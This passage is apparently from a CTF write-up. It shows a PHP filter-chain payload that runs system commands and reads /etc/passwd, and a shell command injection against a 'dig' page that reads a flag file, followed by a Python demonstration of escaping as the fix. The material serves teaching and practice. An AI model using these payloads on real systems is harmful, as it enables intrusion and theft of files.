base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-90.UTF16LE|convert.iconv.IBM874.UNICODEBIG|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-103.ISO-IR-209|convert.iconv.8859_5.CSISO2022JP2|convert.iconv.ISO-2022-JP-3.IBM-943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&1=system('cat /flag_23fb1b3');
```

</details>

In short, keep changing the system command at the end until the flag in the root directory shows up, then cat it.

![image](https://hackmd.io/_uploads/SJ5vPE8dxx.png)

flag:||NCKUCTF{w385h311_15_4_427}||

---

### dig

https://chall.nckuctf.org:28113

![image](https://hackmd.io/_uploads/BkHTsNIugx.png)

Classic command injection. The only things to watch are closing the existing quote and separating the injected commands. Quoted words run just like unquoted ones (`'ls'` == `ls`), so the single quotes we need to balance do not get in the way.

The source drops the input straight into the command string:

```php
<?php if (isset($_POST['name'])) : ?>
<p>
<p>dig result:</p>
<pre><?= system("dig '" . $_POST['name'] . "';") ?></pre>
</p>
<?php endif; ?>
```

payload: google.com';'ls' '/';'cat' '/flag_n2i3na

This yields the command line `dig 'google.com';'ls' '/';'cat' '/flag_n2i3na';`, i.e. three commands: dig, `ls /`, and cat of the flag. The closing `'` comes from the original template, which is why the payload itself does not end with one.

![image](https://hackmd.io/_uploads/SyZInELulg.png)

flag:||NCKUCTF{d19_70015_15_n1c3!}||

---

### dig-waf1

### work in progress from here on `(*>﹏<*)′

![image](https://hackmd.io/_uploads/BJ4R9ONTgl.png)
![image-1](https://hackmd.io/_uploads/r1V0c_Eage.png)
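For the dig challenge above (the dig-waf1 notes are still unfinished), here is an added example, not the challenge's code, that shows how the payload turns the single `system()` string into three commands, and what `escapeshellarg()` would have done to the same input. `split_shell()` is a deliberately small sh-style tokenizer (single quotes, backslash escapes, whitespace and `;`), enough to show how the injected quotes reshape the command list; it is not a full shell parser. `php_escapeshellarg()` reproduces PHP's behaviour on Linux.

```python
"""How the dig payload turns one system() string into three commands.

Added example, not the challenge's code. split_shell() is a minimal sh-style
tokenizer (single quotes, backslash escapes, whitespace, ';'); it is not a full
shell parser. php_escapeshellarg() mirrors PHP's Linux escapeshellarg().
"""
from __future__ import annotations

VULNERABLE_TEMPLATE = "dig '{name}';"                   # the challenge's system() string
PAYLOAD = "google.com';'ls' '/';'cat' '/flag_n2i3na"   # payload from the writeup


def php_escapeshellarg(arg: str) -> str:
    """escapeshellarg() on Linux: wrap in single quotes and replace every
    embedded ' with '\\'' so the argument can never close the quoting."""
    return "'" + arg.replace("'", "'\\''") + "'"


def build_command(name: str, safe: bool = False) -> str:
    """The command line PHP would hand to /bin/sh, raw or with escapeshellarg()."""
    if safe:
        return "dig " + php_escapeshellarg(name) + ";"
    return VULNERABLE_TEMPLATE.format(name=name)


def split_shell(cmdline: str) -> list[list[str]]:
    """Split a command line into commands (on ';') and each command into argv,
    honouring single quotes and backslash escapes the way sh does."""
    commands: list[list[str]] = []
    argv: list[str] = []
    word, in_word, quoted, escaped = "", False, False, False
    for ch in cmdline:
        if escaped:                      # backslash outside quotes: next char is literal
            word, in_word, escaped = word + ch, True, False
        elif quoted:                     # inside '...': everything literal, ' ends it
            if ch == "'":
                quoted = False
            else:
                word += ch
        elif ch == "'":
            quoted, in_word = True, True
        elif ch == "\\":
            escaped = True
        elif ch == ";" or ch.isspace():  # end of word; ';' also ends the command
            if in_word:
                argv.append(word)
            word, in_word = "", False
            if ch == ";" and argv:
                commands.append(argv)
                argv = []
        else:
            word, in_word = word + ch, True
    if quoted or escaped:
        raise ValueError("unterminated quote or escape")
    if in_word:
        argv.append(word)
    if argv:
        commands.append(argv)
    return commands


if __name__ == "__main__":
    print(split_shell(build_command(PAYLOAD)))             # three commands
    print(split_shell(build_command(PAYLOAD, safe=True)))  # one command, payload as one argv
```

With the raw template the payload becomes `[['dig', 'google.com'], ['ls', '/'], ['cat', '/flag_n2i3na']]`; with `escapeshellarg()` the whole payload stays a single argument to `dig`. Escaping fixes this one sink, but the better design is to validate the input against a hostname pattern and to avoid the shell entirely by passing an argument vector to the resolver.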